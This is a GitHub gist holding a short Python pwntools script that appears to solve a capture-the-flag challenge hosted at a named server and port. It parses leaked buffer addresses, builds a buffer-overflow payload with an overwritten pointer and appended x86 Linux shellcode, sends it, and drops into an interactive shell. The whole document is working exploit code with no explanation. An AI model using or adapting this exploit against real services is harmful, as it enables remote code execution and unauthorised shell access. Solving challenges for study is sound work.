Skip to content

Instantly share code, notes, and snippets.

@m---

m---/www.py Secret

Last active August 29, 2015 14:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save m---/029c8827c12a24506270 to your computer and use it in GitHub Desktop.
Save m---/029c8827c12a24506270 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
www.py
# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
host = 'www.termsec.net'
port = 17284
p = lambda x: struct.pack('<I', x)
s = pwn.remote(host, port)
result = s.recv()
matches = re.search('buffers at (0x[0-9a-f]+) and (0x[0-9a-f]+)', result)
ptr_str1 = int(matches.group(1), 16)
ptr_str2 = int(matches.group(2), 16)
pwn.log.info('str1: 0x%x, str2: 0x%x' % (ptr_str1, ptr_str2))
payload = ('A' * 45) + p(0x8049d08) + p(ptr_str1 + 45 + 8) + p(ptr_str1 + 45 + 12) + open('x86-linux-sh', 'rb').read()
payload += 'B' * (200 - len(payload))
payload2 = p(0xdeedbeef)
s.send(payload + "\n")
s.send(payload2 + "\n")
print s.recv()
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment